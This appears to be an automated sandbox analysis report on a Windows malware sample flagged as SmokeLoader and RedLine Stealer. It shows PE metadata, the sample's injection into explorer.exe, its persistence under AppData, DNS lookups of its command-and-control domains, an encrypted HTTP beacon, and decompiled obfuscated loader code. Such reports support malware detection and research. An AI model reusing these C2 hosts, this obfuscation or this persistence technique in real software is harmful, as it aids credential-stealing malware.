IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x16d56	0x16e00	False	0.5953295765027322	data	6.7023696076283805	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x18000	0x2e284	0x2b400	False	0.484662888367052	data	4.836772173500047	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.lokeris	0x47000	0xbb8	0xc00	False	0.008138020833333334	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.zoyan	0x48000	0x270	0x400	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x49000	0x1a510	0x1a600	False	0.6376721712085308	data	6.242624809610504	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x64000	0x1c12	0x1e00	False	0.3893229166666667	data	3.8825366238972383	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AFX_DIALOG_LAYOUT	0x61450	0x2	data	Slovak	Slovakia
AFX_DIALOG_LAYOUT	0x61438	0x2	data	Slovak	Slovakia
AFX_DIALOG_LAYOUT	0x61440	0xc	data	Slovak	Slovakia
SUXUMOWUDAKOLA	0x5f2d0	0x2107	ASCII text, with very long lines (8455), with no line terminators	Slovak	Slovakia
RT_CURSOR	0x61458	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Slovak	Slovakia
RT_CURSOR	0x62300	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Slovak	Slovakia
RT_CURSOR	0x62bd0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0	Slovak	Slovakia
RT_CURSOR	0x62d00	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0	Slovak	Slovakia
RT_ICON	0x49990	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x4a058	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x4c600	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x4ca98	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x4d940	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x4e1e8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x4e750	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x50cf8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x51da0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x52728	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x52bf8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x53aa0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x54348	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x54a10	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Slovak	Slovakia
RT_ICON	0x54f78	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x57520	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x585c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Slovak	Slovakia
RT_ICON	0x58a98	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Slovak	Slovakia
RT_ICON	0x59940	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Slovak	Slovakia
RT_ICON	0x5a1e8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Slovak	Slovakia
RT_ICON	0x5a8b0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Slovak	Slovakia
RT_ICON	0x5ae18	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Slovak	Slovakia
RT_ICON	0x5d3c0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Slovak	Slovakia
RT_ICON	0x5e468	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Slovak	Slovakia
RT_ICON	0x5edf0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Slovak	Slovakia
RT_STRING	0x62fc8	0x542	data	Slovak	Slovakia
RT_ACCELERATOR	0x613d8	0x40	data	Slovak	Slovakia
RT_GROUP_CURSOR	0x62ba8	0x22	data	Slovak	Slovakia
RT_GROUP_CURSOR	0x62db0	0x22	data	Slovak	Slovakia
RT_GROUP_ICON	0x58a30	0x68	data	Slovak	Slovakia
RT_GROUP_ICON	0x4ca68	0x30	data	Slovak	Slovakia
RT_GROUP_ICON	0x52b90	0x68	data	Slovak	Slovakia
RT_GROUP_ICON	0x5f258	0x76	data	Slovak	Slovakia
RT_VERSION	0x62dd8	0x1f0	MS Windows COFF PowerPC object file	Slovak	Slovakia
None	0x61418	0xa	data	Slovak	Slovakia
None	0x61428	0xa	data	Slovak	Slovakia

Imports

DLL

Import

KERNEL32.dll

FillConsoleOutputCharacterA, GetCPInfo, GetProfileIntW, GetSystemDefaultLCID, GetModuleHandleW, WaitNamedPipeW, TlsSetValue, GetPriorityClass, GetVolumeInformationA, LoadLibraryW, IsProcessInJob, AssignProcessToJobObject, GetCalendarInfoW, GetFileAttributesA, TransactNamedPipe, WriteConsoleW, GetVolumePathNameA, CreateJobObjectA, GetVolumeNameForVolumeMountPointA, FillConsoleOutputCharacterW, GetLastError, GetProcAddress, VirtualAlloc, EnumSystemCodePagesW, SetFileAttributesA, LoadLibraryA, WriteConsoleA, GetProcessWorkingSetSize, LocalAlloc, OpenJobObjectW, FoldStringW, FoldStringA, FindFirstChangeNotificationA, GetFileInformationByHandle, FindActCtxSectionStringW, LCMapStringW, GetConsoleAliasesW, GetFullPathNameW, HeapFree, HeapAlloc, Sleep, ExitProcess, GetStartupInfoW, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapReAlloc, WriteFile, GetStdHandle, GetModuleFileNameA, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlUnwind, SetHandleCount, GetFileType, GetStartupInfoA, SetFilePointer, TlsGetValue, TlsAlloc, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RaiseException, GetConsoleOutputCP, MultiByteToWideChar, SetStdHandle, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, CreateFileA, GetModuleHandleA, HeapSize, GetLocaleInfoA, LCMapStringA, GetStringTypeA, GetStringTypeW, SetEndOfFile, GetProcessHeap, ReadFile

ADVAPI32.dll

BackupEventLogW

Possible Origin

Language of compilation system	Country where language is spoken	Map
Slovak	Slovakia

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2022 10:57:02.208288908 CET	49718	80	192.168.2.6	84.21.172.159
Dec 9, 2022 10:57:02.234762907 CET	80	49718	84.21.172.159	192.168.2.6
Dec 9, 2022 10:57:02.234988928 CET	49718	80	192.168.2.6	84.21.172.159
Dec 9, 2022 10:57:02.237436056 CET	49718	80	192.168.2.6	84.21.172.159
Dec 9, 2022 10:57:02.237474918 CET	49718	80	192.168.2.6	84.21.172.159
Dec 9, 2022 10:57:02.264326096 CET	80	49718	84.21.172.159	192.168.2.6
Dec 9, 2022 10:57:02.354650021 CET	80	49718	84.21.172.159	192.168.2.6
Dec 9, 2022 10:57:02.354938984 CET	49718	80	192.168.2.6	84.21.172.159
Dec 9, 2022 10:57:02.357903957 CET	49718	80	192.168.2.6	84.21.172.159
Dec 9, 2022 10:57:02.386727095 CET	80	49718	84.21.172.159	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 9, 2022 10:57:02.137377977 CET	63229	53	192.168.2.6	8.8.8.8
Dec 9, 2022 10:57:02.156404972 CET	53	63229	8.8.8.8	192.168.2.6
Dec 9, 2022 10:57:02.368879080 CET	62538	53	192.168.2.6	8.8.8.8
Dec 9, 2022 10:57:03.383023024 CET	62538	53	192.168.2.6	8.8.8.8
Dec 9, 2022 10:57:04.449312925 CET	62538	53	192.168.2.6	8.8.8.8
Dec 9, 2022 10:57:06.409364939 CET	53	62538	8.8.8.8	192.168.2.6
Dec 9, 2022 10:57:07.409687996 CET	53	62538	8.8.8.8	192.168.2.6
Dec 9, 2022 10:57:08.477850914 CET	53	62538	8.8.8.8	192.168.2.6

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 9, 2022 10:57:07.412796974 CET	192.168.2.6	8.8.8.8	cff9	(Port unreachable)	Destination Unreachable
Dec 9, 2022 10:57:08.478075027 CET	192.168.2.6	8.8.8.8	cff9	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 9, 2022 10:57:02.137377977 CET	192.168.2.6	8.8.8.8	0xe31c	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:57:02.368879080 CET	192.168.2.6	8.8.8.8	0x7334	Standard query (0)	host-host-file8.com	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:57:03.383023024 CET	192.168.2.6	8.8.8.8	0x7334	Standard query (0)	host-host-file8.com	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:57:04.449312925 CET	192.168.2.6	8.8.8.8	0x7334	Standard query (0)	host-host-file8.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 9, 2022 10:57:02.156404972 CET	8.8.8.8	192.168.2.6	0xe31c	No error (0)	host-file-host6.com		84.21.172.159	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:57:06.409364939 CET	8.8.8.8	192.168.2.6	0x7334	Server failure (2)	host-host-file8.com	none	none	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:57:07.409687996 CET	8.8.8.8	192.168.2.6	0x7334	Server failure (2)	host-host-file8.com	none	none	A (IP address)	IN (0x0001)	false
Dec 9, 2022 10:57:08.477850914 CET	8.8.8.8	192.168.2.6	0x7334	Server failure (2)	host-host-file8.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

hhsselotxu.net

host-file-host6.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49718	84.21.172.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 9, 2022 10:57:02.237436056 CET	42	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hhsselotxu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 321 Host: host-file-host6.com
Dec 9, 2022 10:57:02.237474918 CET	42	OUT	Data Raw: 10 87 85 92 6d f5 d1 b5 b8 4b 0a 46 0b b8 e2 f8 44 13 a8 34 d7 46 6b ef cb e6 a9 81 fd a4 e7 81 68 c6 5e d6 19 1c b8 92 e1 af f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd ce f0 d8 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 2f af af 18 Data Ascii: mKFD4Fkh^wmwu$f]d/IxfA;MHsRU?,CE#8Pq'a<zP\|9Bf+ofJD)#uONh=h\M00xDqn \|\|VH>k`vAYb%bYY]
Dec 9, 2022 10:57:02.354650021 CET	43	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Fri, 09 Dec 2022 09:57:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Data Raw: 66 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a Data Ascii: fYour IP blocked0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 5164, Parent PID: 3452

General

Target ID:	0
Start time:	10:55:58
Start date:	09/12/2022
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	391680 bytes
MD5 hash:	0D810E582A95DEBFF5E1A72A76C602C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.248700871.0000000000573000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: file.exePID: 6088, Parent PID: 5164

General

Target ID:	1
Start time:	10:56:04
Start date:	09/12/2022
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	391680 bytes
MD5 hash:	0D810E582A95DEBFF5E1A72A76C602C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.344568009.0000000000420000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.344687233.0000000000521000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.344687233.0000000000521000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3452, Parent PID: 6088

General

Target ID:	2
Start time:	10:56:10
Start date:	09/12/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff647860000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000000.333482536.0000000004EC1000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000000.333482536.0000000004EC1000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rudwaguPID: 5400, Parent PID: 1064

General

Target ID:	10
Start time:	10:57:01
Start date:	09/12/2022
Path:	C:\Users\user\AppData\Roaming\rudwagu
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\rudwagu
Imagebase:	0x400000
File size:	391680 bytes
MD5 hash:	0D810E582A95DEBFF5E1A72A76C602C9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.397674421.0000000000722000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: rudwaguPID: 1324, Parent PID: 5400

General

Target ID:	11
Start time:	10:57:13
Start date:	09/12/2022
Path:	C:\Users\user\AppData\Roaming\rudwagu
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\rudwagu
Imagebase:	0x400000
File size:	391680 bytes
MD5 hash:	0D810E582A95DEBFF5E1A72A76C602C9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.408393791.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.408393791.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.408296472.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000002.408296472.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 5164, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	7.7%
Dynamic/Decrypted Code Coverage:	3.1%
Signature Coverage:	6.4%
Total number of Nodes:	1670
Total number of Limit Nodes:	26

Executed Functions

Function 004058A1 Relevance: 49.3, APIs: 12, Strings: 16, Instructions: 292
librarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E004058A1(void* __fp0) {
				signed int _v16;
				void* _v20;
				signed int _v36;
				long _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t365;
				intOrPtr* _t381;
				intOrPtr* _t384;
				void* _t387;
				void* _t390;
				void* _t394;
				void* _t395;
				void* _t397;
				signed int _t403;
				signed int _t404;
				void* _t405;
				intOrPtr* _t406;
				void* _t412;

				_t412 = __fp0;
				_t404 = _t403 & 0xfffffff8;
				_push(0xffffffff);
				_push(E00416C51);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t404;
				_t405 = _t404 - 0x9c;
				_t397 = 0xe3a7;
				do {
					GetLastError();
					TransactNamedPipe(0, 0, 0, 0, 0, 0, 0); // executed
					_t397 = _t397 - 1;
				} while (_t397 != 0);
				_v76 = 0x812ae72;
				_v108 = 0x374ff37f;
				_v144 = 0x53039ceb;
				_v88 = 0x26f83b54;
				_v152 = 0x2c845f70;
				_v64 = 0x664b1a94;
				_v56 = 0x2038cb82;
				_v104 = 0x18f219b6;
				_v124 = 0x52833b47;
				_v92 = 0x24568fa0;
				_v112 = 0xc292fcb;
				_v68 = 0x310707b5;
				_v60 = 0x7eccb7a1;
				_v128 = 0x51beb4a8;
				_v148 = 0x23570ec5;
				_v96 = 0x13bb2b31;
				_v140 = 0x41e4b1e5;
				_v164 = 0x29829f26;
				_v120 = 0x6640d5e5;
				_v100 = 0x2b35ebd4;
				_v72 = 0x304a9f21;
				_v156 = 0x42da8ef7;
				_v116 = 0x6e9395e5;
				_v160 = 0x4663bccc;
				_v168 = 0xd57d1e7;
				_v80 = 0x58efb44f;
				_v136 = 0x146317d6;
				_v84 = 0x1f0b1819;
				_v132 = 0x3d33338;
				_v76 = _v76 + 0x653b0d1e;
				_v76 = _v76 - 0x1af0d3ea;
				_v76 = _v76 + 0x398a55da;
				_v144 = _v144 - 0x684b7b80;
				_v76 = _v76 - 0x230a939f;
				_v144 = _v144 + 0x59c55b6e;
				_v144 = _v144 + 0x3e4b2e5f;
				_v144 = _v144 - 0x533debbd;
				_v76 = _v76 - 0x4694b7b0;
				_v108 = _v108 + 0x64d2b886;
				_v144 = _v144 + 0x24a8487e;
				_v108 = _v108 + 0x346d58dd;
				_v76 = _v76 - 0x41db75c6;
				_v108 = _v108 + 0x6d280e28;
				_v108 = _v108 - 0x7da0931;
				_v76 = _v76 + 0x694bfc10;
				_v108 = _v108 - 0xc4a1537;
				_v76 = _v76 - 0x37c54368;
				_v144 = _v144 - 0x2c7f8551;
				_v76 = _v76 - 0x3fa9e949;
				_v108 = _v108 + 0x791148db;
				_v108 = _v108 + 0x138bf3c6;
				_v144 = _v144 - 0x61a2b58f;
				_v108 = _v108 - 0x208df69e;
				_v144 = _v144 - 0x497a7bc8;
				_v108 = _v108 - 0x1af05f9e;
				_v108 = _v108 - 0x6b3af13b;
				_v144 = _v144 + 0x6fb1c642;
				_v108 = _v108 - 0x994df12;
				_v76 = _v76 - 0x7867e843;
				_v88 = _v88 + 0x45a20138;
				_v144 = _v144 - 0x4d6b8727;
				_v144 = _v144 + 0x42d16f3c;
				_v144 = _v144 - 0x4aaeb358;
				_v144 = _v144 - 0x5c1aa042;
				_v152 = _v152 + 0x49af1289;
				_v144 = _v144 + 0x437c985f;
				_v108 = _v108 + 0x79b9c2a2;
				_v56 = _v56 + 0x5b4a1592;
				_v88 = _v88 - 0x2ec83452;
				_v144 = _v144 + 0x437869a5;
				_v64 = _v64 + 0x3b025366;
				_v88 = _v88 - 0xd43d2d;
				_v76 = _v76 + 0x7d747d8a;
				_v104 = _v104 + 0x4883c890;
				_v152 = _v152 + 0x289bc367;
				_v76 = _v76 + 0x798c77cb;
				_v76 = _v76 - 0x56be1fbb;
				_v92 = _v92 + 0xdf5b30d;
				_v92 = _v92 + 0x37ed99c9;
				_v56 = _v56 - 0x7715dacd;
				_v88 = _v88 - 0x31376674;
				_v124 = _v124 - 0x636d4c79;
				_v76 = _v76 + 0x35025f94;
				_v76 = _v76 + 0x6e30b30b;
				_v64 = _v64 + 0x14dc745e;
				_v68 = _v68 - 0x169f63ef;
				_v76 = _v76 + 0x7c02df99;
				_v56 = _v56 - 0x2e59662f;
				_v92 = _v92 + 0x155c59a4;
				_v56 = _v56 + 0x7b75a504;
				_v112 = _v112 + 0x219f47f3;
				_v92 = _v92 - 0x67a552b;
				_v108 = _v108 + 0x4a2137a8;
				_v68 = _v68 + 0xc585413;
				_v88 = _v88 - 0x3a14e483;
				_v144 = _v144 + 0x5b524b4e;
				_v60 = _v60 + 0x34fb5402;
				_v92 = _v92 - 0x34bffa78;
				_v124 = _v124 + 0x6aa55f44;
				_v76 = _v76 + 0xf4e48f;
				_v104 = _v104 - 0x2cd6d396;
				_v88 = _v88 - 0x45adcf56;
				_v112 = _v112 + 0x46ab1204;
				_v112 = _v112 - 0x2d00c364;
				_v68 = _v68 + 0x7599e045;
				_v88 = _v88 + 0x74eabc8d;
				_v112 = _v112 + 0x7bf0b077;
				_v88 = _v88 + 0x5b716b01;
				_v104 = _v104 - 0x4d38819a;
				_v108 = _v108 + 0x278eda90;
				_v60 = _v60 + 0x1f444cf3;
				_v60 = _v60 + 0x1092cade;
				_v96 = _v96 + 0x3a66ef6d;
				_v88 = _v88 - 0x6fe2cb96;
				_v108 = _v108 - 0x173e588a;
				_v108 = _v108 + 0x27245b35;
				_v120 = _v120 + 0x441a636b;
				_v60 = _v60 + 0x5ba43329;
				_v164 = _v164 + 0x2901033c;
				_v128 = _v128 + 0x7b88cf48;
				_v76 = _v76 + 0x67a8963c;
				_v144 = _v144 - 0x7d8997bf;
				_v104 = _v104 - 0x626ab517;
				_v112 = _v112 + 0x36ad816d;
				_v88 = _v88 + 0x74cb5282;
				_v92 = _v92 - 0x7230715d;
				_v152 = _v152 - 0x597545ed;
				_v164 = _v164 - 0x3ec80e96;
				_v108 = _v108 - 0x7fd0260;
				_v140 = _v140 - 0x25000d89;
				_v164 = _v164 + 0x17d0d6ee;
				_v96 = _v96 - 0x538210b7;
				_v108 = _v108 - 0x233dd73b;
				_v100 = _v100 + 0x30220508;
				_v76 = _v76 - 0x1cee596;
				_v92 = _v92 - 0x2b0a7c88;
				_v128 = _v128 + 0x4ff17690;
				_v68 = _v68 - 0xaf71342;
				_v92 = _v92 + 0x7ef27e15;
				_v156 = _v156 + 0x47928b6b;
				_v108 = _v108 - 0x2c14997d;
				_v64 = _v64 + 0xa689404;
				_v156 = _v156 - 0xc7d2fed;
				_v60 = _v60 + 0x7d990335;
				_v156 = _v156 + 0x77640fe7;
				_v108 = _v108 + 0x76cee0ec;
				_v100 = _v100 - 0x8ece03b;
				_v56 = _v56 - 0x2b84348d;
				_v64 = _v64 - 0x64f9c0f;
				_v108 = _v108 - 0x8418f68;
				_v68 = _v68 - 0x3ab9c933;
				_v92 = _v92 + 0x32b4df14;
				_v60 = _v60 + 0x189e08f;
				_v60 = _v60 - 0x2cd1dbee;
				_v140 = _v140 + 0x7639de4a;
				_v144 = _v144 - 0x2f37c91f;
				_v116 = _v116 - 0x2bb22a2d;
				_v164 = _v164 + 0x6e49c677;
				_v160 = _v160 + 0x159d10e0;
				_v116 = _v116 + 0x3441d489;
				_v128 = _v128 - 0x83f7a80;
				_v108 = _v108 + 0x48b5e129;
				_v136 = _v136 + 0x56402792;
				_v124 = _v124 + 0xbc9365a;
				_v92 = _v92 + 0x421015e;
				_v168 = _v168 - 0x1e00592f;
				_v68 = _v68 - 0x15ce5b3f;
				_v68 = _v68 + 0x78fb057a;
				_v136 = _v136 - 0x67ec879;
				_v80 = _v80 - 0x1bf010b5;
				_v68 = _v68 - 0x6f1a8863;
				_v144 = _v144 - 0x2898aad2;
				_v84 = _v84 - 0x1e9953fd;
				_v116 = _v116 + 0x169c25d;
				_v96 = _v96 + 0x65ce6471;
				_v128 = _v128 + 0x4d7a962f;
				_v104 = _v104 - 0x21834542;
				_v96 = _v96 + 0x3832462b;
				_v72 = _v72 - 0x3743ab43;
				_v104 = _v104 + 0x3438b52a;
				_v160 = _v160 + 0x387092fa;
				_v64 = _v64 - 0x4cde04ab;
				_v148 = _v148 - 0x6a02c50f;
				_v96 = _v96 + 0x52975e55;
				_v160 = _v160 + 0x16ccda85;
				_v60 = _v60 - 0x721ba79a;
				_v152 = _v152 + 0x3cb8b521;
				_v148 = _v148 - 0x2772cc43;
				_v112 = _v112 + 0x83387bf;
				_v132 = _v132 + 0x530a5665;
				_t409 =  *0x4450c4 - 0x20;
				if( *0x4450c4 == 0x20) {
					WriteConsoleA(0, 0, 0,  &_v52, 0);
					__imp__IsProcessInJob(0, 0, 0);
					GetPriorityClass(0);
					_push("pumitafoto");
					_push(0);
					E00406707(_t387, _t395, _t397, 0, _t409);
					_pop(_t390);
					E00405FD6( &_v60, _t390);
					_push(0);
					_v20 = 0;
					E0040617D();
					E0040625A(_t387, _t397, 0);
					_push(0x38);
					_push(0);
					_push("%s %c");
					_push("msimg32.dll");
					E00406642(_t387, _t395, _t397, 0, _t409);
					E004065EF(_t387, 0, "0.txt", "rb");
					_t406 = _t405 + 0x1c;
					_push(0);
					E004064AE(_t387, _t397, 0, _t409);
					_push(0);
					_push(0);
					_push(0);
					E00406B33(_t387, _t395, _t397, 0, _t409);
					_pop(_t394);
					_t381 = _t406;
					 *_t381 = 0;
					 *((intOrPtr*)(_t381 + 4)) = 0;
					E00404B2A(__fp0);
					st0 = _t412;
					E0040694A(_t387, _t395, _t397, 0, _t409);
					_t384 = _t406;
					 *_t384 = 0;
					 *((intOrPtr*)(_t384 + 4)) = 0;
					E00404B07(_t412, _t394, 0);
					st0 = _t412;
					_v36 = _v36 | 0xffffffff;
					E00405FF3();
				}
				LoadLibraryA("kernel32.dll");
				_t365 =  *0x42e60c; // 0xfff618fd
				 *0x4450c4 = _t365;
				 *0x4450c8 =  *0x42d66c; // executed
				E00404EC6(); // executed
				 *[fs:0x0] = _v16;
				return 0;
			}

0x004058a1
0x004058a4
0x004058ad
0x004058af
0x004058b4
0x004058b5
0x004058bc
0x004058c4
0x004058cb
0x004058cb
0x004058d8
0x004058de
0x004058de
0x004058e1
0x004058e9
0x004058f1
0x004058f9
0x00405901
0x00405909
0x00405911
0x00405919
0x00405921
0x00405929
0x00405931
0x00405939
0x00405941
0x00405949
0x00405951
0x00405959
0x00405961
0x00405969
0x00405971
0x00405979
0x00405981
0x00405989
0x00405991
0x00405999
0x004059a1
0x004059a9
0x004059b1
0x004059b9
0x004059c1
0x004059c9
0x004059d1
0x004059d9
0x004059e1
0x004059e9
0x004059f1
0x004059f9
0x00405a01
0x00405a09
0x00405a11
0x00405a19
